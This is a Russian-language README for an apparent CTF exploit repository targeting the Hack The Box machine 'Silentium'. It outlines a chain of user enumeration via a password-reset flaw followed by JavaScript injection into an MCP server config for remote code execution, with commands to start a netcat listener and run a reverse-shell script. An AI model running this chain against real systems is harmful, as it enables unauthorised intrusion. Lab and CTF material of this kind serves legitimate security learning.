
Эксплуатация Silentium HTB-CTF
Этот репозиторий содержит полную цепочку эксплуатации для машины Silentium на Hack The Box. Эксплойт использует двухэтапную уязвимость, включающую перебор пользователей и инъекцию JavaScript для достижения удаленного выполнения кода (RCE).
Цепочка уязвимостей состоит из недостатка раскрытия информации и критической инъекции кода. Сначала, путем перебора действительных пользователей через баг сброса пароля, мы получаем необходимый контекст для атаки на конечную точку customMCP. RCE достигается путем внедрения вредоносной функции JavaScript в параметр mcpServerConfig, которая выполняется бэкендом Node.js.
У вас должны быть установлены Python 3 и Bash, а также следующая библиотека:
pip install requests
Запустите скрипт перебора (Bash) для поиска действительных учетных записей (требуется users.txt):
python3 CVE-2025-58434.py
На вашей локальной машине запустите слушатель Netcat:
nc -lvnp 4444
Выполните Python-скрипт, указав цель, ваш IP и полученный API-ключ:
python3 CVE-2025-59528.py -t -k <API_KEY> -l <YOUR_IP> -p 4444
| Аргумент | Описание | Обязательный |
|---|---|---|
| -t, --target | Целевой хост | Да |
| -k, --key | API Bearer Token | Да |
| -l, --lhost | Ваш IP слушателя (VPN) | Да |
| -p, --lport | Ваш порт слушателя | Да |
Этот скрипт предназначен только для образовательных целей и авторизованного тестирования на проникновение в средах CTF. Доступ к целям или их атака без предварительного разрешения незаконны.
Задача: Silentium (Hack The Box)
CVEs: CVE-2025-58434 | CVE-2025-59528